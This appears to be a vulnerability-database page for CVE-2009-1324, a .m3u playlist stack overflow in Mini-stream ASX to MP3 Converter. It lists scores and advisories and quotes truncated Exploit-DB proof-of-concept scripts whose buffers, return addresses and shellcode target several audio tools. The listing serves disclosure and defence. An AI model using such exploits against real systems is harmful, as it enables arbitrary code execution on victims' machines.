CVE-2009-1324
published 2009-04-17CVE-2009-1324: Stack-based buffer overflow in Mini-stream ASX to MP3 Converter 3.0.0.7 allows remote attackers to execute arbitrary code via a long URI in a playlist (.m3u)…
PriorityP349critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
16.51%
96.6th percentile
Stack-based buffer overflow in Mini-stream ASX to MP3 Converter 3.0.0.7 allows remote attackers to execute arbitrary code via a long URI in a playlist (.m3u) file.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| asx_to_mp3_converter_project | asx_to_mp3_converter | — | — |
| mini-stream | asx_to_mp3_converter | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6hmf-jpf3-pqf6: ASX to MP3 converter 3
ghsa_unreviewed·2022-05-13·CVSS 9.3
CVE-2017-15221 [CRITICAL] CWE-119 GHSA-6hmf-jpf3-pqf6: ASX to MP3 converter 3
ASX to MP3 converter 3.1.3.7.2010.11.05 has a buffer overflow via a crafted M3U file, a related issue to CVE-2009-1324.
GHSA
GHSA-53hv-rccw-5xwh: Stack-based buffer overflow in Mini-stream ASX to MP3 Converter 3
ghsa_unreviewed·2022-05-02
CVE-2009-1324 [HIGH] CWE-119 GHSA-53hv-rccw-5xwh: Stack-based buffer overflow in Mini-stream ASX to MP3 Converter 3
Stack-based buffer overflow in Mini-stream ASX to MP3 Converter 3.0.0.7 allows remote attackers to execute arbitrary code via a long URI in a playlist (.m3u) file.
No detection rules found.
Exploit-DB
Asx to Mp3 2.7.5 - Local Stack Overflow
exploitdb·2014-10-07
CVE-2009-1324 Asx to Mp3 2.7.5 - Local Stack Overflow
Asx to Mp3 2.7.5 - Local Stack Overflow
---
###########################################################################################
# Exploit Title: ASX to MP3 Converter 2.7.5 stack buffer overflow
# Date: 6 Oct 2014
# Exploit Author: Amir Reza Tavakolian
# Vendor Homepage: http://binarylife.blog.ir/
# Software Link: http://download.cnet.com/ASX-to-MP3-Converter/3000-2168_4-10385919.html
# Version: 2.7.5
# Tested on: windows xp sp 3
#
#
# Special thanks to Mr Michael Czumak (T_v3rn1x) for his tutorial in securitysift.com.
# Thanks Mike. :)
##########################################################################################
#!/usr/bin/perl
my $junk = "\x41" x 35056;
my $eip = pack ('V', 0x73e848a7);
my $nop = "\x90" x 4;
my $shellcode = "\x90" x 25;
$shellcode = $shellcode
Exploit-DB
WM Downloader - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 WM Downloader - '.m3u' Local Stack Overflow (PoC)
WM Downloader - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *************************************************************
# * WM Downloader (.M3U File) Local Stack Overflow POC *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/WMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D00000
#EBX 00333D78 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F739C
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414
Exploit-DB
RM Downloader - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 RM Downloader - '.m3u' Local Stack Overflow (PoC)
RM Downloader - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *********************************************************
# * RM Downloader (.M3U File) Local Stack Overflow POC *
# *********************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/RMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 7C92056D ntdll.7C92056D
#EDX 00A20000
#EBX 00104A54
#ESP 000FFE3C
#EBP 00333E98 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESI 77C2FCE0 MSVCRT.77C2FCE0
#EDI 0000660D
#EI
Exploit-DB
ASX to MP3 Converter 3.0.0.7 - '.m3u' Universal Stack Overflow
exploitdb·2009-04-13
CVE-2009-1324 ASX to MP3 Converter 3.0.0.7 - '.m3u' Universal Stack Overflow
ASX to MP3 Converter 3.0.0.7 - '.m3u' Universal Stack Overflow
---
#!/usr/bin/perl
# ASX to MP3 Converter Version 3.0.0.7 .m3u Universal Stack Overflow Exploit
# Disoverd By Cyber-Zone
# Exploited By Stack
my $Header = "#EXTM3U\n";
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\
Exploit-DB
Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *************************************************************
# * Mini-stream Ripper (.M3U File) Local Stack Overflow POC *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRipper.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333D60 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F70CC ASCII "AAAA"
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2F
Exploit-DB
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# ************************************************************************
# * Mini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRM-MP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D20000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000
Exploit-DB
ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# ************************************************************************
# * ASX to MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/ASXtoMP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F6C90
#EBP 000FBFB4
#ESI 77C2FCE0
Exploit-DB
Euphonics Audio Player 1.0 - '.pls' Universal Local Buffer Overflow
exploitdb·2009-02-04
CVE-2009-0476 Euphonics Audio Player 1.0 - '.pls' Universal Local Buffer Overflow
Euphonics Audio Player 1.0 - '.pls' Universal Local Buffer Overflow
---
#!/usr/bin/perl -w
#-----------------------------------------------------------------------------
# Author : Houssamix
# Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit
# Gr33tz to : str0ke , real-power.net , Legend-spy - stack
# thx to h4ck3r#47 for the fisrt exploit http://milw0rm.com/exploits/7958
# just the ret adress is changed for make the exploit universal
#-----------------------------------------------------------------------------
my $overflow = "\x41" x 1324;
my $ret = "\xCB\xA3\x0F\x10"; # jmp esp from AdjMmsEng.dll >$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "Done \n";
# milw0rm.com [2009-02-04]
Exploit-DB
Euphonics Audio Player 1.0 (Windows XP SP3) - '.pls' Local Buffer Overflow
exploitdb·2009-02-04
CVE-2009-0476 Euphonics Audio Player 1.0 (Windows XP SP3) - '.pls' Local Buffer Overflow
Euphonics Audio Player 1.0 (Windows XP SP3) - '.pls' Local Buffer Overflow
---
#include
#include
#include
#define overflow 1324
#define NOP 0x90
#define pls "Eye.pls"
int main (int argc,char **argv)
{
char winsp3[] = "\x7B\x46\x86\x7C";
char buffer[overflow];
FILE *Player;
unsigned char shellcode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
"\x96\x7d\xb2\x83\xeb\xfc\xe2\xf4\x10\x7e\x39\xb2\xec\x96\xf6\xf7"
"\xd0\x1d\x01\xb7\x94\x97\x92\x39\xa3\x8e\xf6\xed\xcc\x97\x96\xfb"
"\x67\xa2\xf6\xb3\x02\xa7\xbd\x2b\x40\x12\xbd\xc6\xeb\x57\xb7\xbf"
"\xed\x54\x96\x46\xd7\xc2\x59\xb6\x99\x73\xf6\xed\xc8\x97\x96\xd4"
"\x67\x9a\x36\x39\xb3\x8a\x7c\x59\x67\x8a\xf6\xb3\x07\x1f\x21\x96"
"\xe8\x55\x4c\x72\x88\x1d\x3d\x82\x69\x56\x05\xbe\x67\xd6\x71\x39"
"\x9c\x8a\xd0\x39\x84\x9e
Exploit-DB
Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow
exploitdb·2009-02-03
CVE-2009-0476 Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow
Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow
---
#!/usr/bin/perl -w
#-----------------------------------------------------------------------------
# Author : h4ck3r#47
# Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit
# Tested in Windows Pro Sp3 (English)
# Gr33tz to : str0ke , T.N.T:18 , AlpHaNiX , All arab4services.net and friends
#-----------------------------------------------------------------------------
my $overflow = "\x41" x 1324;
my $ret = "\x7B\x46\x86\x7C"; # jmp ESP from kernel32.dll in Windows pro Sp3
my $nop = "\x90" x 100 ;
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
my $shellcode =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\
No writeups or analysis indexed.
http://secunia.com/advisories/34681http://www.securityfocus.com/bid/34494https://exchange.xforce.ibmcloud.com/vulnerabilities/49840https://www.exploit-db.com/exploits/8407https://www.exploit-db.com/exploits/8412http://secunia.com/advisories/34681http://www.securityfocus.com/bid/34494https://exchange.xforce.ibmcloud.com/vulnerabilities/49840https://www.exploit-db.com/exploits/8407https://www.exploit-db.com/exploits/8412
2009-04-17
Published